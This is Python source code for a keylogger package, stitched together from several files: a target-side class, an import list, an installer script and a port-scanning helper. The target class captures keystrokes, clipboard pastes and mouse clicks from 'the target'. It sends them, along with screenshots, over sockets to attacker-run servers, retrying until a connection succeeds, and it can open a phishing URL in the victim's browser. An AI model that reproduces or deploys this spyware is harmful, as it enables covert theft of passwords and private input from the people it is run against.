        key_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        try:
            for x in range(zeit + 1):
                print(x)
                zeit -= 1
                time.sleep(1)
                if x in seconds_list:
                    self.client()
                    # The images will be sent
            while True:
                try:
                    key_data.connect((ip_keylogger, port_keylogger))
                    break
                except:
                    continue

            # This is the ip and the port of the server the port shouldn't be the same the server_photos and the server_keylogger shouldn't be
            # in the same folder
            print(self.coordinates)
            wort = ""
            for zeichen in self.richtige_liste:
                wort += zeichen

            # Gets the coordinates where the target was writing something from the beginning
            # Sends the data to server_keylogger
            all_data = str(self.coordinates) + wort
            # Coordinates and keydata are being concatenated
            key_data.send(all_data.encode())
            print(wort)
            print(self.richtige_liste)
            # Closes the image

            self.send_image(ip_photos, port_photos)

            # We have to go back so that we can delete the other directories
            sys.exit()
            # Stops the keylogger
        except KeyboardInterrupt:
            self.send_image(ip_photos, port_photos)

            # If the target has destroyed the connection
            wort = "***%§§)§§%"
            # This is like a special code. To split it at the end
            for zeichen in self.richtige_liste:
                wort += zeichen
            if self.coordinates:
                wort += str(self.coordinates)
            data = f"THE CONNECTION HAS BEEN INTERRUPTED{wort}"
            # This let's the server know that the server should shut down
            while True:
                try:
                    key_data.connect((ip_keylogger, port_keylogger))
                    key_data.send(data.encode())
                    key_data.close()
                    break
                except:
                    continue

            if not os.listdir():
                data = [image for image in os.listdir() if "IMAGE" in image]
                for each in data:
                    os.remove(each)

    def kill_switch(self):
        # This function destroys the mouse info
        new_seconds = self.duration + 5
        # 20 seconds are being added because there might be a problem
        for x in range(new_seconds):
            time.sleep(1)
        # This stopes the
        sys.exit()

    def on_click(self, x, y, button, pressed):
        # This is the click function
        print(f"Target has pressed {x} and {y}")
        # All the coordinates will be stored in "self.coordinates"
        if (x,y) not in self.coordinates:
            self.coordinates.append((x, y))

    def all_clicks(self):
        # This is just a function so it can be ran with threading
        with Listener(on_click=self.on_click) as listening:
            self.kill_switch()
            listening.join()

    def copy_data(self):
        self.richtige_liste.append(" (COPY (Strg+c)) ")

    def append_paste(self):
        data = f" ({pyperclip.paste()} | PASTE (Strg+v)) | "
        self.richtige_liste.append(data)

    def print_work(self, word):
        print(f'Alphabetic key was pressed: {word} ')
        self.richtige_liste += word
        # Every pressed key will be saved in "richtige_liste" this is a german self.word and means "right_list"

    def on_press(self, key):
        try:
            try:
                other_charecters = {"1": "!", "2": '"', "3": "§", "4": "$", "5": "%", "6": "&", "7": "/", "8": "(",
                                    "9": ")", "0": "=", "ß": "?"}
                if self.caps is True:
                    if key.char in other_charecters:
                        self.word = other_charecters[key.char]
                        # Upper Characters from "1" to "0" because all this numbers are not charecters are not in pynput
                    else:
                        self.word = key.char.upper()
                else:
                    self.word = key.char

                all_req_keys = {"": self.copy_data, "": self.append_paste}
                # "ETX" stands for "End-Text-character" and is a control character which knows the character of copying something on the keyboard
                # "SYN" stands for "Synchronous Idle" and is a control character which knows the character of pasting something on the keyboard
                for each_key in all_req_keys:
                    if each_key == key.char:
                        # If the copy character is pressed, each function of each character will be working
                        all_req_keys[each_key]()
                try:
                    asci_number = ord(self.word)
                    # Ordinal number in the range of 0 to 31 completes all special characters with the key "strg + letter"
                    if asci_number not in range(0, 32):
                        # if there is no special character it just prints the alphabetic number
                        self.print_work(self.word)

                except TypeError:
                    # prints the alphabetc number
                    self.print_work(self.word)

                print(self.richtige_liste)
            except TypeError:
                pass

        except AttributeError:
            print(f'An other key was pressed: {key}')
            if key == keyboard.Key.tab:
                self.richtige_liste += " [TAB] "

            elif key == keyboard.Key.enter:
                self.richtige_liste += " [ENTER] "

            elif key == keyboard.Key.space:
                self.richtige_liste += "{"
                # If the target presses tab or space a "{" will be appended to the list so the attacker knows when and
                # space or a tab key has been pressed
            elif key == keyboard.Key.caps_lock:
                self.caps = True
                self.check.append(1)
            check_caps = sum(self.check) / 2
            # If check_caps is not primary it will set self.caps to False

            if str(check_caps)[-1] != '0':
                pass
            else:
                self.caps = False
                # This resets everything

            if key == keyboard.Key.backspace:
                dt = datetime.now()
                # Gets the current time
                get_time = str(dt).split(":")
                # This splits the time so the minutes and seconds are displayed

                hour, minutes, sec = int(get_time[0][::-1][0:2][::-1]), int(get_time[1]), float(get_time[2])
                # Gets the current hour, minute and second

                all = hour * 3600 + minutes * 60 + sec
                # Gets the seconds of everything from hour to second
                if not self.seconds:
                    # If there is nothing in the list second will be appanded
                    self.seconds.append(all)
                minus = all - self.seconds[0]
                # This checks if the target is holding the backspace key
                if minus > 0.05 or minus == 0.0:
                    if self.richtige_liste:
                        self.richtige_liste.pop(-1)
                        # Removes the last item of the list

                self.seconds[0] = all
                # List will allways be updated

    def on_release(self, key):
        print(f'Key released: {key}')

    @staticmethod
    def internet_connection():
        # This function checks if a connection is stable
        while True:
            try:
                requests.get("https://www.google.com/")
                # Google is always online so I chose google
                break
                # If there is an internet connection it will run as normal
            except requests.exceptions.ConnectionError:
                print("No Connection")

    def start(self):
        self.internet_connection()
        time.sleep(1)
        # Just to cool down

        listening_thread = threading.Thread(target=self.daten_aufnehemen)
        # This runs the program behind the actual programming
        listening_thread.start()

        if self.phishing is not None:
            while True:
                if self.true_connection:
                    try:
                        requests.get(self.phishing)
                        # Response is here to see if the website is online or not
                        webbrowser.open(self.phishing)
                        break

                    except requests.exceptions.ConnectionError:
                        break

                    except requests.exceptions.InvalidURL:
                        break



        threading_mouse = threading.Thread(target=self.all_clicks)
        # This runs the progrmm behind the actual programming
        threading_mouse.start()
        # If the server is the down it will store the data locally and wait until the server is available again.
        while True:
            try:
                send_timer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                send_timer.connect((self.ip_timer, self.port_timer))

                send_timer.send(str(self.duration).encode())
                # This sends the seconds to the server
                send_timer.close()
                break

            except:
                continue


        with keyboard.Listener(on_press=self.on_press, on_release=self.on_release) as listener:
            self.countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger,
                                self.port_keylogger)
            listener.join()
            # This listens to the keys that where ty



from .Server_timer import Timer
from .Server_listener import ServerListener
from .Server_keylogger import ServerKeylogger
from .Keylogger_Target import KeyloggerTarget
from .Server_photos import ServerPhotos
from .Port_data import Ports
from .Simulation_code import Simulation



import os
from sys import platform

pip_lst = ["pip", "pip3"]
pip_quest = input("Which pip is working for you?: ")
def install_all():

    print(f"{pip_quest} install BetterPrinting")
    os.system(f"{pip_quest} install BetterPrinting")
    print(f"{pip_quest} install pynput")
    os.system(f"{pip_quest} install pynput")
    print(f"{pip_quest} install pyautogui")
    os.system(f"{pip_quest} install pyautogui")
    print(f"{pip_quest} install Pillow")
    os.system(f"{pip_quest} install Pillow")
def audio():
    print(f"{pip_quest} install pyaudio")
    os.system(f"{pip_quest} install pyaudio")
    print(f"{pip_quest} install KeyloggerScreenshot")
    os.system(f"{pip_quest} install KeyloggerScreenshot")

if platform == "linux":
    if pip_quest in pip_lst:
        install_all()
        print(f"sudo apt-get install portaudio19-dev python3-pyaudio")
        os.system(f"sudo apt-get install portaudio19-dev python3-pyaudio")
        audio()
        print("sudo apt-get install scrot")
        os.system("sudo apt-get install scrot")

    else: print(f"{pip_quest} is not a pip version. Pleease choose between pip and pip3")

else:
    install_all()
    audio()



import subprocess
import sys

class Ports:

    @staticmethod
    def get_working_ports():
        if sys.platform != "linux":
            # Only here for windows
            cmd = subprocess.check_output(["netstat", "-ano"])
            # This command shows all the ports on your pc
            all = cmd.split()

            working_ports = []
            zahlen = [str(zahl) for zahl in range(0, 11)]
            # makes a range of numbers from 0 to 10

            for each in all:
                str_each = str(each)
                if ":" in str_each:
                    switch = str_each[::-1]
                    # for e.g "0.0.0.0:1352" will be turned around to 5312:0.0.0.0 so it's easier to parse trough
                    this_port = ""
                    for port in switch:
                        if port not in zahlen: pass
                        # This gets all unnecessary charecters away
                        if port == ":": break
                        # Check if number are there if ":" is there it will stop
                        this_port += port
                        # If all this conditions aren't true it will form to a number

                    another_switch = this_port[::-1]
                    # from our example "this_port" will contain "5312" to get the original port we are just flipping the port again
                    if "'" in another_switch: another_switch = another_switch.replace("'", "")

                    if len(another_switch) == 4:
                        # Only ports with the length of 4 digits will go through because we only use 4 digits for the ports in KeyloggerScreenshot
                        working_ports.append(another_switch)
            return working_ports
            # If everything is good it will return all other ports
        return None
        # This is only for os other than windwos
